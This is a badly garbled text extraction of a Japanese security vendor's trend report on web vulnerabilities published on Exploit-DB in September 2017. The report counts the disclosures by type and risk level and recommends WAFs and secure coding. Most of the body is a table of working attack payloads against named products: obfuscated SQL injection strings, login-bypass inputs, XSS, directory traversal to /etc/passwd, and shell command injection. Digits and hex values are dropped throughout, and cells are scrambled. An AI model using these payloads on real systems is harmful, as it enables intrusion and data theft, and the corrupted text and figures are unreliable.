サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (207.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報ですペンタセキュリティシステムズ株式会社 R&D センタ

Size: px

Start display at page:

Download "サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (207.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報ですペンタセキュリティシステムズ株式会社 R&D センタ"

みいかこのえ
5 years ago
Views:

1 207.09

2 サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (207.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報ですペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 207 年 9 月に公開された Exploit-DB の脆弱性報告件数は総 72 件でありその中で SQL インジェクションが 62 件で最も多い件数で発見されました 9 月に公開された SQL インジェクション脆弱性は攻撃を実行し易い方だと分類されました何故ならこの攻撃はオンライン検索を通じてダウンロードできる攻撃ツールの使い方さえ知れば誰にでも手軽に悪用できるからですですがこのような易い攻撃難易度持つ同時に SQL インジェクションはその危険度が高すぎて早急に対応が必要である攻撃に分類されました幸いに大部の SQL インジェクション攻撃は Web アプリケーションファイアウォール通じて容易に対応できますよって持続的なセキュリティを維持するためには Web アプリケーションファイアウォールとセキュアコディングを活用した多層防御を具現しなければなりません. 脆弱性別件数脆弱性カテゴリ件数ファイルアップロード (File Upload) コマンドインジェクション (Command Injection) 2 クロスサイトスクリプティング (Cross Site Scripting:XSS) 2 ディレクトリトラバーサル (Directory Traversal) 5 SQLインジェクション (SQL Injection) 62 合計脆弱性別件数危険度別件数危険度件数割合早急対応要 % 高 % 中 3 4.7% 合計 % 危険度別件数攻撃実行の難易度別件数難易度件数割合難 % 中 % 易 % 合計 % 4. 主なソフトウェア別脆弱性発生件数ソフトウェア名件数 Joomla 2 A2billing 2 PHP Dashboards 2 Wordpress ICHotelReservation IC-T-Shirt igreeting Cards PTC KSV Script Wireless Repeater ICProjectBidding The Car Project ICClassifieds Ultimate HR System Carlo Gavazzi Powersoft Cory Support PTCEvolution Pay Banner Text Link Ad ICEstate Online Invoice System ICGrocery EzInvoice ICSurvey EzBan CodeMeter My Builder Marketplace ICLowBidAuction Law Firm ICAffiliateTracking Restaurant Website Script Enterprise Edition Payment Processor Script Professional Service Booking Apache Tomcat Online Print Business ICHelpDesk Just Dial Marketplace ICDental Clinic Job Board Software ICCallLimousine Babysitter Website Script ICProductConfigurator Escort Marketplace ICJewelry JobStar Monster Clone Script ICStudents ICAutosales ICTraveling ICDutchAuction ICDoctor Appointment ICRestaurant software AirStar Airbnb Clone Script ICAuction EduStar Udemy Clone Script ICMLM itech StockPhoto Script Carel PlantVisor itech Book Store Script Indusoft Web Studio inclick Cloud Server Theater Management Script Gr8 Multiple Search Engine Script Adserver Script FoodStar Justdial Clone Script osticket Contact Manager XYZ Auto Classifieds NETGEAR ReadyNAS Surveillance Consumer Review Script ICSiteBuilder 合計攻撃実行の難易度別件数主なソフトウェア別脆弱性発生件数早急対応要高中難中易 Joomla A2billing PHP Dashboards Wordpress ICHotelReservation IC-T-Shirt igreeting Cards PTC KSV Script Wireless Repeater ICProjectBidding The Car Project ICClassifieds Ultimate HR System

3 最新脆弱性トレンドレポート (207.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です POST HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/ XSS 易早急対応要 WordPress Plugin Participants Database < XSS 脆弱性 Wordpress WordPress Plugin Participants Database < first_name=<script>alert("");</script>&last_name=a&emai l=a@a.com /ourproducts/checklist/checklist/tag/social'and+(select++from SQL Injection 高早急対応要 Joomla! Component CheckList..0 +(SeLeCT+count(*),COncaT((SeLeCT(SeLeCT+COncaT(cast( database()+as+char),0x7e))+from+information_schema.tabl es+where+table_schema=database()+limit+0,),floor(rand(0 )*2))x+FrOM+information_schema.tables+group+by+x)a)+A ND+''='.html Joomla Joomla! Component CheckList SQL Injection 易早急対応要 Joomla! Component Survey Force Deluxe 'invite' Parameter SQL Injection 脆弱性 /index.php?option=com_surveyforce&task=start_invited&surv ey=9&invite=%20and%20=-- Joomla Joomla! Component Survey Force Deluxe POST /cgi-bin/webupg HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/ Command Injection 高早急対応要 Wireless Repeater BE26 - Remote Code Execution 脆弱性 Wireless Repeater Wireless Repeater BE26 name=http&url= -al >/var/mycode;&password=a&port=8&dir=a POST /actions/changeconfiguration.html HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/ XSS 高高 CodeMeter XSS 脆弱性 CodeMeter CodeMeter 6.50 Action=CertifiedTimeConfiguration&TimeServerList=cmtime.c odemeter.com%7ccmtime.codemeter.de%7ccmtime.codeme ter.us%7ccmtime.codehacker.de/>"<img src="evil.source" onload=alert("gutenmorgen")>%7c SQL Injection 高早急対応要 igreeting Cards.0 /index.php?index&search&k=efe'+/*!2union*/(/*! 2SelEcT*/+0x28329,VERSioN(),0x283329,0x283429,0x ,0x283629,0x283729,0x283829)--+iGreeting Cards igreeting Cards.0 POST /a2billing/agent/public/checkout_process.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/ SQL Injection 難早急対応要 A2billing 2.x A2billing A2billing 2.x transactionid= unise//**lecton selinse//**rtect,2,3,4,0x706c75676e70679,0x3c3f c f f f504f53545b6e6696c6974 5d29293b203f3e,7,8,9,0,,2,3-//**- - &sess_id=448&key=98346a2b29c3c78dc89b eb /info.php?car_id=- 5+/*!22uNiOn*/(/*!22sELect*/0x28329,0x283229,/*!22CONCAT_WS*/(0x203a20,/*!22USER*/(),/*!22 DATABASE*/(),VERSION()),0x283429,0x283529,0x283629,0x ,0x283829,0x283929,0x ,0x283329,0x SQL Injection 易早急対応要 The Car Project ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,(44),0x ,0x ,0x ,0x ,0x ) The Car Project The Car Project.0 POST /a2billing/agent/public/checkout_process.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/ SQL Injection 高早急対応要 A2billing 2.x A2billing A2billing 2.x transactionid=%20and%20=-- &sess_id=448key=636902c6ed0db5780eb63d26e Directory Traversal 易高 Ultimate HR System <=.2 /download?type=document&filename=../../../../../etc/passwd Ultimate HR System Ultimate HR System <= SQL Injection 易早急対応要 Cory Support - 'pr' Parameter SQL Injection 脆弱性 /listfaq.php?pr=9999+and+=2+union+all+select+null,versio n()-- Cory Support Cory Support SQL Injection 易早急対応要 Pay Banner Text Link Ad.0.6. /index.php?action=stats&id=%20and%20=-- Pay Banner Text Link Ad Pay Banner Text Link Ad.0.6. /editclient.php?cid=- 5+/*!00003uNiOn*/(/*!00003SelECt*/+0x28329,/*!50000C ONCAT_WS*/(0x203a20,USER()),/*!50000CONCAT_WS*/(0x 203a20,DATABASE()),/*!50000CONCAT_WS*/(0x203a20,VER SION()),0x283529,(/*!50000SelECt*/+export_set(5,@:=0,(S SQL Injection 高早急対応要 Online Invoice System 3.0 elect+count(*)from(information_schema.columns)where@: =export_set(5,export_set(5,@,table_name,0x3c6c693e,2),col umn_name,0xa3a,2)),@,2)),0x283729,0x283829,0x283929,0 x ,0x283329,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x )--+- Online Invoice System Online Invoice System 3.0 /editclient.php?id=- 00+/*!22UniOn*/+/*!22SeleCt*/+0x28329,/*!2 2CONCAT_WS*/(0x203a20,/*!22USER*/(),/*!22DATA SQL Injection 高早急対応要 EzInvoice 6.02 BASE*/(),VERSION()),0x283329,/*!22CONCAT_WS*/(0x2 03a20,/*!22USER*/(),/*!22DATABASE*/(),VERSION() ),/*!22CONCAT_WS*/(0x203a20,/*!22USER*/(),/*! 22DATABASE*/(),VERSION()),/*!22CONCAT_WS*/(0x20 3a20,/*!22USER*/(),/*!22DATABASE*/(),VERSION()) --+- EzInvoice EzInvoice 6.02

4 最新脆弱性トレンドレポート (207.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です /ezban.php?id=00++and(/*!00002select*/+0x / *!00002frOM*/+(/*!00002SelEcT*/+cOUNT(*),/*!00002cOnC at*/((/*!00002select*/(/*!00002select*/+/*!00002conca SQL Injection 高早急対応要 EzBan 'id' Parameter SQL Injection 脆弱性 T*/(cAST(dATABASE()+aS+/*!00002cHAR*/),0x7e,0x E53656e6366e))+/*!00002FRoM*/+iNFORMATION_sCHE MA.tABLES+/*!00002wHERE*/+tABLE_sCHEMA=dATABASE() +limit+0,),floor(/*!00002rand*/(0)*2))x+/*!00002from */+information_schema.tables+group+by+x)a)+/*!000 02aNd*/+=&action=show EzBan EzBan SQL Injection 易早急対応要 My Builder Marketplace.0 /marketplace?start_date=%20and%20=-- My Builder Marketplace My Builder Marketplace SQL Injection 易早急対応要 Law Firm.0 /business-searchlist?country=%20and%20=-- &state=%20and%20=--&city=%20and%20=-- &farm_cat=%20and%20=-- Law Firm Law Firm.0 /cms.php?id=- 6'++/*!00002UNION*/+/*!00002SELECT*/+0x3,0x32,0x33, SQL Injection 易早急対応要 Restaurant Website Script.0 (Select+export_set(5,@:=0,(select+count(*)from(informatio n_schema.columns)where@:=export_set(5,export_set(5,@,t able_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x 35,0x36,0x37,0x38,0x39,0x330,0x33,0x332,0x333,0x3 34,0x335,0x336,0x337,0x338,9,20,0x323,0x Restaurant Website Script Restaurant Website Script.0 /content.php?page=- 7+/*!50000UniOn*/+/*!50000SelECt*/+0x e SQL Injection 高早急対応要 Professional Service Booking.0 56e6366e,(Select+export_set(5,@:=0,(select+count(*)from (information_schema.columns)where@:=export_set(5,export _set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))-- Professional Service Booking Professional Service Booking.0 /product-decs.php?cat_id=- 49++/*!50000UNION*/(/*!50000SELECT*/+0x28329,0x ,0x283329,0x283429,0x283529,0x283629,0x283729,0x ,0x283929,0x ,0x283329,0x ,0x SQL Injection 高早急対応要 Online Print Business ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x , ere@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x ,0x , 0x )-- Online Print Business Online Print Business SQL Injection 高早急対応要 Just Dial Marketplace.0 /result/%20and%20=--/efe/ Just Dial Marketplace Just Dial Marketplace.0 /job-details/- 3'+/*!50000UNION*/(/*!50000SELECT*/+0x28329,0x ,0x283329,(Select+export_set(5,@:=0,(select+count(*)fr om(information_schema.columns)where@:=export_set(5,exp ort_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a, SQL Injection 高早急対応要 Job Board Software.0 2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929,0x ,0x283329,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x ,0x )--/eFe Job Board Software Job Board Software.0 /taskers?skills=63'and+(/*!44455select*/+0x3+/*!44455fr OM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*! 44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(d SQL Injection 高早急対応要 Babysitter Website Script.0 ATABASE()+As+char),0x7e,0x E53656e6366e))+/ *!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE */+table_schema=database()+limit+0,),floor(rand(0)*2)) x+/*!44455from*/+information_schema.tables+/*!44455g ROUP*/+bY+x)a)+aND+==' Babysitter Website Script Babysitter Website Script.0 /prof_detils.html?escort= '+/*!2UnIoN*/+(/*!2SelEcT*/0x28329,0x283229,0x283329,0x283429,(Select+export_set(5,@:=0,( SQL Injection 高早急対応要 Escort Marketplace.0 /*!2SelEcT*/+count(*)from(information_schema.column s)where@:=export_set(5,export_set(5,@,table_name,0x3c6c 693e,2),column_name,0xa3a,2)),@,2)),0x283629,0x283729, 0x283829,0x283929,0x ,0x283329,0x ,0x ,0x ,0x ,0x )-- Escort Marketplace Escort Marketplace SQL Injection 易早急対応要 JobStar Monster Clone Script.0 /jobdetailshow?id=%20and%20=-- JobStar Monster Clone Script JobStar Monster Clone Script SQL Injection 易早急対応要 PHP Dashboards NEW 4.4 /php/share/save.php?dashid=%20and%20=-- PHP Dashboards PHP Dashboards NEW Directory Traversal 易高 PHP Dashboards NEW 4.4 /php/file/read.php?filename=../../../etc/passwd PHP Dashboards PHP Dashboards NEW SQL Injection 高早急対応要 AirStar Airbnb Clone Script.0 /airstar/hotel/roomsedit/detailedroom/6 AND 8995=8995?mem_count=&check_in=&check_out=&search_ city=madurai,india&min_amt=0&max_amt=50&inout=0 AirStar Airbnb Clone Script AirStar Airbnb Clone Script SQL Injection 易早急対応要 EduStar Udemy Clone Script.0 /courses/details?course_id=05 and = EduStar Udemy Clone Script EduStar Udemy Clone Script.0 POST / HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/ SQL Injection 易早急対応要 itech StockPhoto Script 2.02 itech StockPhoto Script itech StockPhoto Script 2.02 stock=9 AND 977= SQL Injection 易早急対応要 itech Book Store Script 2.02 /book_details.php?id=id=2 AND SLEEP(5)-- itech Book Store Script itech Book Store Script 2.02 /client.php?pageid=sites&subpid=modify&site_id=- ++/*!00008UniOn*/+/*!00008sEleCT*/+0x28329,0x SQL Injection 高早急対応要 inclick Cloud Server 5.0 9,0x283329,0x283429,(Select+export_set(5,@:=0,(select+co unt(*)from(information_schema.columns)where@:=export_s et(5,export_set(5,@,table_name,0x3c6c693e,2),column_nam e,0xa3a,2)),@,2)),0x283629,0x283729,0x283829,0x283929,0 x ,0x inclick Cloud Server inclick Cloud Server SQL Injection 高早急対応要 Gr8 Multiple Search Engine Script.0 /%20and%20=--/X.html Gr8 Multiple Search Engine Script Gr8 Multiple Search Engine Script SQL Injection 易早急対応要 FoodStar.0 /public/frontend/search?keyword=%20and%20=-- FoodStar FoodStar SQL Injection 難早急対応要 osticket.0 /file.php?key[id` = UNION SELECT,2,3-- ]=&signature=&expires= osticket osticket SQL Injection 高早急対応要 XYZ Auto Classifieds.0 /xyz-auto-classifieds/item/view/3 and sleep(5) XYZ Auto Classifieds XYZ Auto Classifieds SQL Injection 易早急対応要 Consumer Review Script.0 /review-details.php?idvalue=9 and sleep(5) Consumer Review Script Consumer Review Script SQL Injection 易早急対応要 ICSiteBuilder. /index.php?page=news&nid=%20and%20=-- ICSiteBuilder ICSiteBuilder.

5 最新脆弱性トレンドレポート (207.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です SQL Injection 易早急対応要 SQL Injection 易早急対応要 SQL Injection 易早急対応要 SQL Injection 易早急対応要 SQL Injection 易早急対応要 SQL Injection 易早急対応要 ICHelpDesk. - 'pk' Parameter SQL Injection 脆弱性 ICEstate. - 'id' Parameter SQL Injection 脆弱性 ICDental Clinic.2 ICProjectBidding. ICCallLimousine. ICGrocery. /index.php?page=static_pages&pk=%20and%20=-- ICHelpDesk ICHelpDesk. /details.aspx?id=%20and%20=-- ICEstate ICEstate. /index.php?page=static_pages&key=%20and%20=-- ICDental Clinic ICDental Clinic.2 /admin/editadminuser.php?id=%20and%20=-- ICProjectBidding ICProjectBidding. /index.php?page=static_pages&key=%20and%20=-- ICCallLimousine ICCallLimousine. /index.php?page=static_pages&key=%20and%20=-- ICGrocery ICGrocery SQL Injection 易早急対応要 ICProductConfigurator. - 'key' Parameter SQL Injection /index.php?page=static_pages&key=%20and%20=-- ICProductConfigurator ICProductConfigurator SQL Injection 易早急対応要 SQL Injection 易早急対応要 SQL Injection 易早急対応要 IC-T-Shirt.2 ICJewelry. ICSurvey. /index.php?page=static_pages&key=%20and%20=-- IC-T-Shirt IC-T-Shirt.2 /index.php?page=static_pages&key=%20and%20=-- ICJewelry ICJewelry. /survey.php?page=preview&test=%20and%20=-- ICSurvey ICSurvey. /index.php?page=static_page&key=- EfE'+/*!00009UniOn*/+/*!00009SelEcT*/+0x3,0x32,0x3c SQL Injection 高早急対応要 ICStudents.2 33e e e4344e3c2f6833e,(/*!00009Selec t*/+export_set(5,@:=0,(/*!00009select*/+count(*)from(info rmation_schema.columns)where@:=export_set(5,export_set( 5,@,/*!00009table_name*/,0x3c6c693e,2),/*!00009column_ name*/,0xa3a,2)),@,2))-- ICStudents ICStudents.2 /post_details.php?city=0&id=- 306'++/*!00004UNION*/+/*!00004SELECT*/+0x3,0x32,0 x33,0x34,0x35,0x36,(/*!00004select*/+export_set(5,@:=0,( SQL Injection 高早急対応要 ICClassifieds. /*!00004select*/+count(*)from(information_schema.columns )where@:=export_set(5,export_set(5,@,/*!00004table_name */,0x3c6c693e,2),/*!00004column_name*/,0xa3a,2)),@,2)), 0x e e6366e,0x39,0x330,0x33,0x332, 0x333,0x334,0x335,0x336,0x337-- ICClassifieds ICClassifieds. POST /admin HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/ SQL Injection 易早急対応要 ICTraveling 2.2 ICTraveling ICTraveling 2.2 user='or = or ''='&pass='anything' SQL Injection 易早急対応要 ICAutosales 2.2 /index.php?cmd=advertise_details&category=car&aid=%20a nd%20=-- ICAutosales ICAutosales SQL Injection 易早急対応要 ICDutchAuction.2 /admin/viewuserips.php?id=%20and%20=-- ICDutchAuction ICDutchAuction SQL Injection 易早急対応要 ICRestaurant software.4 /index.php?page=static_pages&key=%20and%20=-- ICRestaurant software ICRestaurant software SQL Injection 易早急対応要 ICDoctor Appointment.3 /index.php?page=static_pages&key=%20and%20=-- ICDoctor Appointment ICDoctor Appointment SQL Injection 易早急対応要 SQL Injection 易早急対応要 ICAuction 'id' Parameter SQL Injection 脆弱性 ICHotelReservation 3.3 /item.php?id=%20and%20=-- ICAuction ICAuction 2.2 /index.php?page=static_pages&key=%20and%20=-- ICHotelReservation ICHotelReservation 3.3 /index.php?page=static_pages&key='+/*!00007union*/+/*! 00007SelEct*/+0x28329,0x283229,0x3c6833e e SQL Injection 高早急対応要 ICMLM e6366e3c2f6833e,(/*!50000Select*/+export_set(5,@:=0,(/*!50000select*/+count(*)from(information_schema. columns)where@:=export_set(5,export_set(5,@,/*!50000tab le_name*/,0x3c6c693e,2),/*!50000column_name*/,0xa3a,2) ),@,2))-- ICMLM ICMLM SQL Injection 易早急対応要 Directory Traversal 高中 ICLowBidAuction 3.3 Carel PlantVisor /admin/editadminuser.php?id=%20and%20=-- ICLowBidAuction ICLowBidAuction 3.3 /..%5c/..%5c/..%5c/..%5c/..%5c/..%5ctest.txt Carel PlantVisor Carel PlantVisor Directory Traversal 易中 Carlo Gavazzi Powersoft 2... /../../../../../../../../../../../text.txt?res=&valid=true Carlo Gavazzi Powersoft Carlo Gavazzi Powersoft Directory Traversal 易中 Indusoft Web Studio /../../../../../../../../../../../text.txt Indusoft Web Studio Indusoft Web Studio POST /icaffiliatetracking/adminlogin.asp HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/ SQL Injection 易早急対応要 ICAffiliateTracking. ICAffiliateTracking ICAffiliateTracking. user='or = or ''='&pass='anything' /show-time.php?moid=- 00'++/*!08888UNION*/(/*!08888SELECT*/0x28329,0x ,0x283329,0x283429,0x283529,0x283629,0x283729,0x ,0x283929,0x ,0x283329,(/*!08888Select*/ SQL Injection 高早急対応要 Theater Management Script export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from */(information_schema.columns)where@:=export_set(5,expo rt_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888co lumn_name*/,0xa3a,2)),@,2)),0x ,0x ,0x ,0x ,0x ,0x ,0x , 0x ,0x ,0x ,0x )-- Theater Management Script Theater Management Script /gpt.php?v=entry&type=+'++and(/*!00000select*/+0x /*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!0 0000CoNCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dA SQL Injection 高早急対応要 PTC KSV Script.7 - 'type' Parameter SQL Injection 脆弱性 TABASE()+aS+cHAR),0x7e,0x E53656e6366e))+f ROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEM A=dATABASE()+lIMIT+0,),fLOOR(rAND(0)*2))x+fROM+iNF ORMATION_sCHEMA.tABLES+gROUP+bY+x)a) AND ''='&id=& PTC KSV Script PTC KSV Script.7 /manage-target.php?id= SQL Injection 高早急対応要 Adserver Script 5.6 3'+/*!00008union*/+/*!00008select*/++/*!00008CONCAT_ WS*/(0x203a20,USER(),DATABASE(),VERSION())--+- &wap=0 Adserver Script Adserver Script 5.6 /products?id=- ++/*!00002UNION*/(/*!00002SELECT*/+0x28329,0x SQL Injection 高早急対応要 Enterprise Edition Payment Processor Script ,0x283329,0x283429,0x283529,0x283629,0x283729,0x ,0x283929,0x ,0x283329,0x ,0x ,0x ,0x ,0x ,/*!00002CONCAT_ WS*/(0x203a20,USER(),DATABASE(),VERSION()))--+- &action=update Enterprise Edition Payment Processor Script Enterprise Edition Payment Processor Script 3.7

6 最新脆弱性トレンドレポート (207.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です /restaurantsdetails.php?fid=46'++and(/*!00000select*/+0x /*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!00000Co SQL Injection 高早急対応要 Justdial Clone Script - 'fid' Parameter SQL Injection 脆弱性 NCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dATABASE ()+as+char),0x7e,0x e53656e6366e))+from+in FORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATA BASE()+lIMIT+0,),fLOOR(rAND(0)*2))x+fROM+iNFORMATI ON_sCHEMA.tABLES+gROUP+bY+x)a) AND ''=' Justdial Clone Script Justdial Clone Script /index.php?view=products&id=- 4++/*!03333UNION*/(/*!03333SELECT*/+(),(/*!03333Sele SQL Injection 高早急対応要 PTCEvolution 5.50 ct*/+export_set(5,@:=0,(/*!03333select*/+count(*)/*!0333 3from*/(information_schema.columns)where@:=export_set( 5,export_set(5,@,/*!03333table_name*/,0x3c6c693e,2),/*!0 3333column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8), (9))-- PTCEvolution PTCEvolution SQL Injection 易早急対応要 Contact Manager.0 - 'f ' Parameter SQL Injection 脆弱性 /login.php?forgot=2&f =%20and%20=-- Contact Manager Contact Manager.0 PUT /.jsp/ HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/ File Upload 易高 Apache Tomcat < 9.0. (Beta) / < / < / < File Upload 脆弱性 Content-Length: 26 Apache Tomcat Apache Tomcat < 9.0. (Beta) / < / < / < <% out.println("hello");%> Command Injection 易早急対応要 NETGEAR ReadyNAS Surveillance Command Injection 脆弱性 /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;ls -al%205;%27 NETGEAR ReadyNAS Surveillance NETGEAR ReadyNAS Surveillance.4.3-6

最新 Web 脆弱性トレンドレポート (06.0) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06

最新 Web 脆弱性トレンドレポート (06.0) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 06.0 最新 Web 脆弱性トレンドレポート (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年月に公開された Exploit-DB の分析の結果 SQL Injection 攻撃に対する脆弱性報告数が最も多かったです

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (207.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センタ

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (207.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報ですペンタセキュリティシステムズ株式会社 R&D センタ